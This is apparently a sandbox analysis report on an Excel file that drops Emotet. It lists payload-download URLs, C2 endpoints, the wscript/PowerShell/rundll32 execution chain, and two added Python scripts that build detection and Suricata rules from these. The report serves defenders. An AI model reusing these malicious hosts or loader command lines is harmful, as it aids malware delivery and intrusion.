Analysis
max time kernel: 134s
max time network: 152s
platform: windows10-2004_x64
resource: win10v2004-20221111-en
resource tags: arch:x64, arch:x86, image:win10v2004-20221111-en, locale:en-us, os:windows10-2004-x64, system
submitted: 25-01-2023 08:09

Behavioral task: behavioral1
Sample: 8137ec71fc0aeab0be48d885d1334de3.xls
Resource: win7-20220812-en

General
Target: 8137ec71fc0aeab0be48d885d1334de3.xls
Size: 121KB
MD5: 8137ec71fc0aeab0be48d885d1334de3
SHA1: e88e7cb7c1d78aecf48b226d1c8e4c1089ed7204
SHA256: b270f1dc0e9a1979ad04d277031b351fd46e4edcc244404db32226259f89ccb2
SHA512: bd9247f2c2cc45a9f9eedbc8ba499f615d19ee30c0f76748e12135426522251b089fb4b7758fad45c5880e9cd87c67a8b0bc221ec41db59862735cdfb8c80e5f
SSDEEP: 3072:ucKoSsxzNDZLDZjlbR868O8KlVH37kehvMqAPjxO5xyZUE5V5xtezEVg8/dgcBFl:ucKoSsxzNDZLDZjlbR868O8KlVH37keI
Malware Config
Extracted
https://youlanda.org/eln-images/n8DPZISf/
http://rosevideo.net/eln-images/EjdCoMlY8Gy/
http://vbaint.com/eln-images/H2pPGte8XzENC/
https://framemakers.us/eln-images/U5W2IGE9m8i9h9r/
http://niplaw.com/asolidfoundation/yCE9/
http://robertmchilespe.com/cgi/3f/
http://vocoptions.net/cgi/ifM9R5ylbVpM8hfR/
http://missionnyc.org/fonts/JO5/
http://robertflood.us/eln-images/DGI2YOkSc99XPO/
http://mpmcomputing.com/fonts/fJJrjqpIY3Bt3Q/
http://dadsgetinthegame.com/eln-images/tAAUG/
http://smbservices.net/cgi/JO01ckuwd/
http://stkpointers.com/eln-images/D/
http://rosewoodcraft.com/Merchant2/5.00/PGqX/
Extracted
emotet
Epoch4
185.248.140.40:443
8.9.11.48:443
200.17.134.35:7080
207.38.84.195:8080
79.172.212.216:8080
45.176.232.124:443
45.118.135.203:7080
162.243.175.63:443
110.232.117.186:8080
103.75.201.4:443
195.154.133.20:443
160.16.102.168:80
164.68.99.3:8080
131.100.24.231:80
216.158.226.206:443
159.89.230.105:443
178.79.147.66:8080
178.128.83.165:80
212.237.5.209:443
82.165.152.127:8080
50.116.54.215:443
58.227.42.236:80
119.235.255.201:8080
144.76.186.49:8080
138.185.72.26:8080
162.214.50.39:7080
81.0.236.90:443
176.104.106.96:8080
144.76.186.55:7080
129.232.188.93:443
212.24.98.99:8080
203.114.109.124:443
103.75.201.2:443
173.212.193.249:8080
41.76.108.46:8080
45.118.115.99:8080
158.69.222.101:443
107.182.225.142:8080
212.237.17.99:8080
212.237.56.116:7080
159.8.59.82:8080
46.55.222.11:443
104.251.214.46:8080
31.24.158.56:8080
153.126.203.229:8080
51.254.140.238:7080
185.157.82.211:8080
217.182.143.207:443
45.142.114.231:8080
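The two Extracted blocks above are the actionable output of this report. As an added example (not part of the sandbox report and not Emotet tooling), the script below parses the config in the exact line form the report prints it, validates every ip:port pair, pulls the hostnames out of the stage URLs, and emits one Suricata alert per endpoint. The embedded input is a truncated copy of the config above (the report lists 14 URLs and 49 endpoints); the function names, the sid numbering and the rule format are this example's own choices.

```python
"""Parse the report's 'Extracted' config blocks into IOCs and Suricata rules.

Added example; not from the sandbox and not from any Emotet tooling.
"""
import ipaddress
import re
from urllib.parse import urlsplit

# Constructed input: a truncated copy of the report's two "Extracted" blocks.
CONFIG_TEXT = """\
Extracted
https://youlanda.org/eln-images/n8DPZISf/
http://rosevideo.net/eln-images/EjdCoMlY8Gy/
http://robertmchilespe.com/cgi/3f/
Extracted
emotet
Epoch4
185.248.140.40:443
8.9.11.48:443
200.17.134.35:7080
207.38.84.195:8080
"""

ENDPOINT_RE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5})$")


def parse_config(text):
    """Return {'family', 'botnet', 'urls', 'c2'} from report-style config text.

    Lines are classified by shape: URLs, ip:port pairs, and bare labels. The
    first two bare labels are taken as family and botnet (the order the report
    prints them in); anything else is rejected rather than silently dropped.
    """
    cfg = {"family": None, "botnet": None, "urls": [], "c2": []}
    seen_header = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "Extracted":
            seen_header = True
            continue
        if not seen_header:
            raise ValueError("config entry before first 'Extracted' header: %r" % line)
        m = ENDPOINT_RE.match(line)
        if line.startswith(("http://", "https://")):
            cfg["urls"].append(line)
        elif m:
            ip = ipaddress.IPv4Address(m.group(1))  # raises ValueError on an octet > 255
            port = int(m.group(2))
            if not 1 <= port <= 65535:
                raise ValueError("port out of range: %r" % line)
            cfg["c2"].append((str(ip), port))
        elif cfg["family"] is None:
            cfg["family"] = line
        elif cfg["botnet"] is None:
            cfg["botnet"] = line
        else:
            raise ValueError("unrecognised config entry: %r" % line)
    return cfg


def url_hosts(urls):
    """Distinct hostnames from the stage URLs, for DNS/proxy blocking or hunting."""
    return sorted({urlsplit(u).hostname for u in urls})


def ports_in_use(cfg):
    """Histogram of C2 ports; the 443/7080/8080 mix shows port-only blocking is of little use."""
    counts = {}
    for _, port in cfg["c2"]:
        counts[port] = counts.get(port, 0) + 1
    return counts


def suricata_rules(cfg, sid_base=9000001):
    """One outbound-connection alert per endpoint. sid_base is this example's convention."""
    rules = []
    for i, (ip, port) in enumerate(cfg["c2"]):
        rules.append(
            'alert tcp $HOME_NET any -> %s %d (msg:"%s %s C2 %s:%d"; '
            "flow:to_server; sid:%d; rev:1;)"
            % (ip, port, cfg["family"], cfg["botnet"], ip, port, sid_base + i)
        )
    return rules


if __name__ == "__main__":
    cfg = parse_config(CONFIG_TEXT)
    print(cfg["family"], cfg["botnet"], len(cfg["urls"]), "urls,", len(cfg["c2"]), "endpoints")
    for host in url_hosts(cfg["urls"]):
        print("block host:", host)
    for rule in suricata_rules(cfg):
        print(rule)
```

A C2 list extracted from one sample is a snapshot, so rules generated this way should carry the extraction date and be retired rather than accumulate; the parser raises on anything it cannot classify so that a changed report layout fails loudly instead of producing an empty blocklist.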
Signatures

Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro. Here EXCEL.EXE (PID 4972) launched wscript.exe (PID 388) to run c:\programdata\tjspowj.vbs, consistent with a macro dropping and executing a script.
Processes (description | pid | pid_target | process | target process):
  Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 388 | 4972 | wscript.exe | EXCEL.EXE
Blocklisted process makes network request (13 IoCs)
Processes (flow | pid | process):
  38 | 5088 | powershell.exe
  58 | 5088 | powershell.exe
  60 | 5088 | powershell.exe
  62 | 5088 | powershell.exe
  64 | 5088 | powershell.exe
  66 | 5088 | powershell.exe
  70 | 1908 | rundll32.exe
  78 | 1908 | rundll32.exe
  82 | 1908 | rundll32.exe
  85 | 1908 | rundll32.exe
  86 | 1908 | rundll32.exe
  87 | 1908 | rundll32.exe
  88 | 1908 | rundll32.exe
Downloads MZ/PE file
Checks computer location settings (2 TTPs, 1 IoC)
Looks up the country code configured in the registry, likely a geofence.
Processes (description | ioc | process):
  Key value queried | \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation | wscript.exe
Loads dropped DLL (4 IoCs)
Processes (pid | process):
  5032 | rundll32.exe
  4752 | rundll32.exe
  764 | rundll32.exe
  1908 | rundll32.exe
Drops file in System32 directory (1 IoC)
Processes (description | ioc | process):
  File opened for modification | C:\Windows\SysWOW64\Kidkmwuyqaydrqwt\ziwzsspywbsiz.gef | rundll32.exe
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). The sandbox's generic note calls this likely ransomware behaviour; for this sample the extracted config identifies Emotet, a loader, so treat the heuristic as weak evidence on its own.
Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandbox environments. Note that these reads are attributed to EXCEL.EXE itself, not to the dropped script or DLL, so they may be ordinary application behaviour rather than evasion by the sample.
Processes (description | ioc | process):
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | EXCEL.EXE
Enumerates system info in registry (2 TTPs, 3 IoCs)
Processes (description | ioc | process):
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | EXCEL.EXE
Suspicious behavior: AddClipboardFormatListener (1 IoC)
Processes (pid | process):
  4972 | EXCEL.EXE
Suspicious behavior: EnumeratesProcesses (4 IoCs)
Processes (pid | process):
  5088 | powershell.exe
  5088 | powershell.exe
  1908 | rundll32.exe
  1908 | rundll32.exe
Suspicious use of AdjustPrivilegeToken (1 IoC)
Processes (description | pid | process):
  Token: SeDebugPrivilege | 5088 | powershell.exe
Suspicious use of SetWindowsHookEx (12 IoCs)
Processes (pid | process):
  4972 | EXCEL.EXE (12 identical entries)
Suspicious use of WriteProcessMemory (20 IoCs)
Every row below pairs a parent with a child it created (the same edges as the process tree), so in this run the signature records process creation rather than injection into an unrelated process.
Processes (description | pid | process | target process | count):
  PID 4972 wrote to memory of 388 | 4972 | EXCEL.EXE | wscript.exe | 2
  PID 388 wrote to memory of 2044 | 388 | wscript.exe | cmd.exe | 2
  PID 2044 wrote to memory of 5088 | 2044 | cmd.exe | powershell.exe | 2
  PID 388 wrote to memory of 1020 | 388 | wscript.exe | cmd.exe | 2
  PID 1020 wrote to memory of 5032 | 1020 | cmd.exe | rundll32.exe | 3
  PID 5032 wrote to memory of 4752 | 5032 | rundll32.exe | rundll32.exe | 3
  PID 4752 wrote to memory of 764 | 4752 | rundll32.exe | rundll32.exe | 3
  PID 764 wrote to memory of 1908 | 764 | rundll32.exe | rundll32.exe | 3
Processes

Process tree (indentation = depth; PIDs taken from the signature tables above; image path, then command line, then the signatures that fired for that process):

1. C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE (PID 4972)
   "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\8137ec71fc0aeab0be48d885d1334de3.xls"
   - Checks processor information in registry
   - Enumerates system info in registry
   - Suspicious behavior: AddClipboardFormatListener
   - Suspicious use of SetWindowsHookEx
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\SYSTEM32\wscript.exe (PID 388)
      wscript c:\programdata\tjspowj.vbs
      - Process spawned unexpected child process
      - Checks computer location settings
      - Suspicious use of WriteProcessMemory
      3. C:\Windows\system32\cmd.exe (PID 2044)
         C:\Windows\system32\cmd.exe /c ""C:\programdata\uidpjewl.bat" "
         - Suspicious use of WriteProcessMemory
         4. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 5088)
            powershell -enc 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
            - Blocklisted process makes network request
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
      3. C:\Windows\System32\cmd.exe (PID 1020)
         "C:\Windows\System32\cmd.exe" /c start /B c:\windows\syswow64\rundll32.exe c:\programdata\puihoud.dll,tjpleowdsyf
         - Suspicious use of WriteProcessMemory
         4. \??\c:\windows\syswow64\rundll32.exe (PID 5032)
            c:\windows\syswow64\rundll32.exe c:\programdata\puihoud.dll,tjpleowdsyf
            - Loads dropped DLL
            - Suspicious use of WriteProcessMemory
            5. C:\Windows\SysWOW64\rundll32.exe (PID 4752)
               C:\Windows\SysWOW64\rundll32.exe "c:\programdata\puihoud.dll",DllRegisterServer
               - Loads dropped DLL
               - Drops file in System32 directory
               - Suspicious use of WriteProcessMemory
               6. C:\Windows\SysWOW64\rundll32.exe (PID 764)
                  C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Kidkmwuyqaydrqwt\ziwzsspywbsiz.gef",kXCEFoePMAvs
                  - Loads dropped DLL
                  - Suspicious use of WriteProcessMemory
                  7. C:\Windows\SysWOW64\rundll32.exe (PID 1908)
                     C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Kidkmwuyqaydrqwt\ziwzsspywbsiz.gef",DllRegisterServer
                     - Blocklisted process makes network request
                     - Loads dropped DLL
                     - Suspicious behavior: EnumeratesProcesses

The last stage names C:\Windows\System32\Kidkmwuyqaydrqwt\ziwzsspywbsiz.gef, but the process is 32-bit (SysWOW64\rundll32.exe), so file-system redirection resolves that path to C:\Windows\SysWOW64\Kidkmwuyqaydrqwt\ziwzsspywbsiz.gef, the location recorded under "Drops file in System32 directory" and in the downloads list. That file and c:\programdata\puihoud.dll carry identical hashes (see Downloads), so the DLL is copied into the random SysWOW64 directory rather than fetched again, and the only network activity after the PowerShell stage comes from the final rundll32.exe (PID 1908).
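The tree above is a textbook Office-to-loader chain: Excel spawns wscript.exe, which fans out into an encoded PowerShell stage and a rundll32.exe stage that loads a DLL from ProgramData, calls DllRegisterServer, and re-launches itself on a copy with a non-DLL extension. As an added example that is not part of the report, the Python below runs the detections a SOC would write for this chain over process-creation events constructed from the tree (PIDs, images and command lines copied from the report; the event layout is a loose Sysmon Event ID 1 shape, and the encoded PowerShell payload, which the report does not reproduce, is replaced by a placeholder). The rule names and the benign control event are this example's own.

```python
"""Detections for the report's process chain, run over constructed events.

Added example, not code from the sandbox. The event tuples mirror the report's
process tree; the rules and their names are this example's own.
"""
import ntpath
import re
from collections import namedtuple

Event = namedtuple("Event", "pid ppid image cmdline")

# Constructed events. PIDs, images and command lines are taken from the report;
# the PowerShell payload is not reproduced there, so a placeholder stands in.
EVENTS = [
    Event(4972, 1000, r"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE",
          r'"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\8137ec71fc0aeab0be48d885d1334de3.xls"'),
    Event(388, 4972, r"C:\Windows\SYSTEM32\wscript.exe", r"wscript c:\programdata\tjspowj.vbs"),
    Event(2044, 388, r"C:\Windows\system32\cmd.exe", r'C:\Windows\system32\cmd.exe /c ""C:\programdata\uidpjewl.bat" "'),
    Event(5088, 2044, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"powershell -enc <elided>"),
    Event(1020, 388, r"C:\Windows\System32\cmd.exe",
          r'"C:\Windows\System32\cmd.exe" /c start /B c:\windows\syswow64\rundll32.exe c:\programdata\puihoud.dll,tjpleowdsyf'),
    Event(5032, 1020, r"C:\Windows\SysWOW64\rundll32.exe", r"c:\windows\syswow64\rundll32.exe c:\programdata\puihoud.dll,tjpleowdsyf"),
    Event(4752, 5032, r"C:\Windows\SysWOW64\rundll32.exe", r'C:\Windows\SysWOW64\rundll32.exe "c:\programdata\puihoud.dll",DllRegisterServer'),
    Event(764, 4752, r"C:\Windows\SysWOW64\rundll32.exe",
          r'C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Kidkmwuyqaydrqwt\ziwzsspywbsiz.gef",kXCEFoePMAvs'),
    Event(1908, 764, r"C:\Windows\SysWOW64\rundll32.exe",
          r'C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Kidkmwuyqaydrqwt\ziwzsspywbsiz.gef",DllRegisterServer'),
    # Constructed benign control: Excel opened from the shell with no script child.
    Event(6000, 1000, r"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE",
          r'"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\Documents\budget.xlsx"'),
]

OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "cmd.exe", "powershell.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
USER_WRITABLE = ("c:\\programdata\\", "c:\\users\\", "c:\\windows\\temp\\")
# Switches powershell.exe accepts for -EncodedCommand: the documented -e and -ec plus any unique prefix.
ENC_SWITCHES = {"e", "ec"} | {"encodedcommand"[:n] for n in range(2, 15)}
RUNDLL32_RE = re.compile(r'(?i)\s*"?[^"\s]*rundll32(?:\.exe)?"?\s+"?([^",]+)"?\s*,\s*(\S+)')


def base(path):
    return ntpath.basename(path).lower()


def is_encoded_powershell(cmdline):
    """True if any -switch/ /switch on the command line is an -EncodedCommand form."""
    return any(m.group(1).lower() in ENC_SWITCHES
               for m in re.finditer(r"(?i)(?:^|\s)[-/]([a-z]+)\b", cmdline))


def rundll32_module(cmdline):
    """(module_path, export) parsed from a rundll32 command line, or None."""
    m = RUNDLL32_RE.match(cmdline)
    return (m.group(1), m.group(2)) if m else None


def ancestry(events, pid):
    """Root-to-leaf PID chain for pid, following ppid links present in the batch."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(pid)
        pid = by_pid[pid].ppid
    return chain[::-1]


def detect(events):
    """Return (pid, rule, detail) findings over a batch of process-creation events."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        name = base(e.image)
        parent = by_pid.get(e.ppid)
        if parent and base(parent.image) in OFFICE and name in SCRIPT_HOSTS:
            findings.append((e.pid, "office_spawns_script_host", "%s -> %s" % (base(parent.image), name)))
        if name == "powershell.exe" and is_encoded_powershell(e.cmdline):
            findings.append((e.pid, "encoded_powershell", e.cmdline))
        if name == "rundll32.exe":
            mod = rundll32_module(e.cmdline)
            if mod:
                path, export = mod
                ext = ntpath.splitext(path.lower())[1]
                # Module outside a system directory, or with an extension that is not .dll
                if path.lower().startswith(USER_WRITABLE) or ext != ".dll":
                    findings.append((e.pid, "rundll32_suspicious_module", path))
                # rundll32 calling DllRegisterServer is regsvr32 behaviour under another name
                if export.lower() == "dllregisterserver":
                    findings.append((e.pid, "rundll32_dllregisterserver", path))
    return findings


if __name__ == "__main__":
    for pid, rule, detail in detect(EVENTS):
        print(pid, rule, detail, "chain:", "->".join(map(str, ancestry(EVENTS, pid))))
```

The rules fire on the wscript.exe child of Excel, on the encoded PowerShell stage, and on all four rundll32.exe stages, while the benign control event produces nothing; the ancestry helper reconstructs the same root-to-leaf chain the WriteProcessMemory table encodes, which is what an analyst needs to pivot from a single rundll32.exe alert back to the document that started it.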
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

C:\ProgramData\puihoud.dll
  Filesize: 412KB
  MD5: 77eeb66f96fd8dd8e98c26f061ba7a8b
  SHA1: 8f3384b4015ccdf4f89baabd615e8660ecb51b82
  SHA256: 18e3b0d902f95fb74affd0f0e203b5a7d6d8a9aa17967611b17377008b5f0c52
  SHA512: 315be0f546c45214da53e238b4b6a9f4c930ef1be9f3a4ff71002afda091fe533275c2f4f8c403ffc1b8e73ec076c2465ad14c7e9df3707536d46089b9940ef6

C:\Windows\SysWOW64\Kidkmwuyqaydrqwt\ziwzsspywbsiz.gef
  Filesize: 412KB
  MD5: 77eeb66f96fd8dd8e98c26f061ba7a8b
  SHA1: 8f3384b4015ccdf4f89baabd615e8660ecb51b82
  SHA256: 18e3b0d902f95fb74affd0f0e203b5a7d6d8a9aa17967611b17377008b5f0c52
  SHA512: 315be0f546c45214da53e238b4b6a9f4c930ef1be9f3a4ff71002afda091fe533275c2f4f8c403ffc1b8e73ec076c2465ad14c7e9df3707536d46089b9940ef6

C:\programdata\uidpjewl.bat
  Filesize: 3KB
  MD5: 6af598c95c689c2be476d63c499354db
  SHA1: 6affcd3ef00724c2ce144950d79a6195ce72c06e
  SHA256: 7a899fe4ad1682d78e178b77e3e1eb7c5a5d30c84482e8f5c8d2ae078e983029
  SHA512: 3c2d0dc7cc0281cf9553bc3442b7a47b3cd7ab723b201441056c1a87094b8f11aa79a0728b0d60e3279fab97d809cf237802e839a3079f6ca67df468e06e9b70

\??\c:\programdata\puihoud.dll
  Filesize: 412KB
  MD5: 77eeb66f96fd8dd8e98c26f061ba7a8b
  SHA1: 8f3384b4015ccdf4f89baabd615e8660ecb51b82
  SHA256: 18e3b0d902f95fb74affd0f0e203b5a7d6d8a9aa17967611b17377008b5f0c52
  SHA512: 315be0f546c45214da53e238b4b6a9f4c930ef1be9f3a4ff71002afda091fe533275c2f4f8c403ffc1b8e73ec076c2465ad14c7e9df3707536d46089b9940ef6

\??\c:\programdata\tjspowj.vbs
  Filesize: 689B
  MD5: 24a3cd3164d4db5a47b7a321aa51b0c6
  SHA1: eb7277f82001af340b6404300465629b19811c3a
  SHA256: 5eed2cdac8033b25525f9240c83f793f12e606451298bb314ab4b40af62f08a2
  SHA512: 3ed236cd1bfa2283eec0443dcabd602fc100a2b4c38b60aa9ab99d769dc61f115032686b5572db16e98b9ecb44a94053eb9f0a9b46e94a854217311d0076c8e2

Memory dumps (memory/pid-index-range; each of the four rundll32.exe stages, PIDs 5032, 4752, 764 and 1908, yields one 160KB region, which is where to start when unpacking the payload):
memory/388-139-0x0000000000000000-mapping.dmp
memory/764-162-0x0000000000000000-mapping.dmp
memory/764-164-0x00000000012C0000-0x00000000012E8000-memory.dmp  Filesize: 160KB
memory/1020-150-0x0000000000000000-mapping.dmp
memory/1908-169-0x0000000002AD0000-0x0000000002AF8000-memory.dmp  Filesize: 160KB
memory/1908-167-0x0000000000000000-mapping.dmp
memory/2044-143-0x0000000000000000-mapping.dmp
memory/4752-159-0x0000000000F30000-0x0000000000F58000-memory.dmp  Filesize: 160KB
memory/4752-157-0x0000000000000000-mapping.dmp
memory/4972-141-0x000001F735440000-0x000001F735444000-memory.dmp  Filesize: 16KB
memory/4972-133-0x00007FF97CD10000-0x00007FF97CD20000-memory.dmp  Filesize: 64KB
memory/4972-173-0x00007FF97CD10000-0x00007FF97CD20000-memory.dmp  Filesize: 64KB
memory/4972-137-0x00007FF97AC00000-0x00007FF97AC10000-memory.dmp  Filesize: 64KB
memory/4972-174-0x00007FF97CD10000-0x00007FF97CD20000-memory.dmp  Filesize: 64KB
memory/4972-136-0x00007FF97CD10000-0x00007FF97CD20000-memory.dmp  Filesize: 64KB
memory/4972-175-0x00007FF97CD10000-0x00007FF97CD20000-memory.dmp  Filesize: 64KB
memory/4972-176-0x00007FF97CD10000-0x00007FF97CD20000-memory.dmp  Filesize: 64KB
memory/4972-135-0x00007FF97CD10000-0x00007FF97CD20000-memory.dmp  Filesize: 64KB
memory/4972-132-0x00007FF97CD10000-0x00007FF97CD20000-memory.dmp  Filesize: 64KB
memory/4972-138-0x00007FF97AC00000-0x00007FF97AC10000-memory.dmp  Filesize: 64KB
memory/4972-134-0x00007FF97CD10000-0x00007FF97CD20000-memory.dmp  Filesize: 64KB
memory/5032-151-0x0000000000000000-mapping.dmp
memory/5032-154-0x0000000002720000-0x0000000002748000-memory.dmp  Filesize: 160KB
memory/5088-149-0x00007FF993610000-0x00007FF9940D1000-memory.dmp  Filesize: 10.8MB
memory/5088-148-0x0000021DEEDD0000-0x0000021DEF576000-memory.dmp  Filesize: 7.6MB
memory/5088-147-0x00007FF993610000-0x00007FF9940D1000-memory.dmp  Filesize: 10.8MB
memory/5088-146-0x00007FF993610000-0x00007FF9940D1000-memory.dmp  Filesize: 10.8MB
memory/5088-145-0x0000021DEDFD0000-0x0000021DEDFF2000-memory.dmp  Filesize: 136KB
memory/5088-144-0x0000000000000000-mapping.dmp